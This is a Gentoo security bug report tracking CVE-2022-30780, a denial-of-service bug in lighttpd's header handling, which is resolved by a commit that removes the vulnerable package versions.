Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!

Bug 851234 (CVE-2022-30780)

Summary: <www-servers/lighttpd-1.4.59: DoS due to typo in connection handling
Product: Gentoo Security Reporter: John Helmert III <ajak>
Component: VulnerabilitiesAssignee: Gentoo Security <security>
Status: RESOLVED FIXED    
Severity: minor CC: herb, proxy-maint
Priority: Normal    
Version: unspecified   
Hardware: All   
OS: Linux   
URL: https://redmine.lighttpd.net/issues/3059
Whiteboard: B3 [noglsa]
Package list:
Runtime testing required: ---

Description John Helmert III archtester Gentoo Infrastructure gentoo-dev Security 2022-06-11 17:04:21 UTC 
CVE-2022-30780:

Lighttpd 1.4.56 through 1.4.58 allows a remote attacker to cause a denial of service (CPU consumption from stuck connections) because connection_read_header_more in connections.c has a typo that disrupts use of multiple read operations on large headers.

A rather silly writeup exists, along with an exploit:

https://podalirius.net/en/cves/2022-30780/
https://github.com/p0dalirius/CVE-2022-30780-lighttpd-denial-of-service
Comment 1 Larry the Git Cow gentoo-dev 2022-07-24 01:49:00 UTC 
The bug has been referenced in the following commit(s):

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=2f561442e589e60f79873b3f4db5e9935970ac46

commit 2f561442e589e60f79873b3f4db5e9935970ac46
Author:     Sam James <sam@gentoo.org>
AuthorDate: 2022-07-24 01:48:23 +0000
Commit:     Sam James <sam@gentoo.org>
CommitDate: 2022-07-24 01:48:52 +0000

    www-servers/lighttpd: drop 1.4.55-r102, 1.4.58-r2, 1.4.59-r2
    
    Bug: https://bugs.gentoo.org/851234
    Bug: https://bugs.gentoo.org/830691
    Bug: https://bugs.gentoo.org/803821
    Signed-off-by: Sam James <sam@gentoo.org>

 www-servers/lighttpd/Manifest                      |   3 -
 www-servers/lighttpd/files/conf/lighttpd.conf      | 279 ---------------------
 .../files/lighttpd-1.4.59-nspr-header.patch        |  16 --
 www-servers/lighttpd/files/lighttpd.initd          |  79 ------
 www-servers/lighttpd/lighttpd-1.4.55-r102.ebuild   | 247 ------------------
 www-servers/lighttpd/lighttpd-1.4.58-r2.ebuild     | 268 --------------------
 www-servers/lighttpd/lighttpd-1.4.59-r2.ebuild     | 242 ------------------
 www-servers/lighttpd/metadata.xml                  |   2 -
 8 files changed, 1136 deletions(-)
Comment 2 Sam James archtester Gentoo Infrastructure gentoo-dev Security 2022-07-24 01:50:05 UTC 
GLSA vote: no.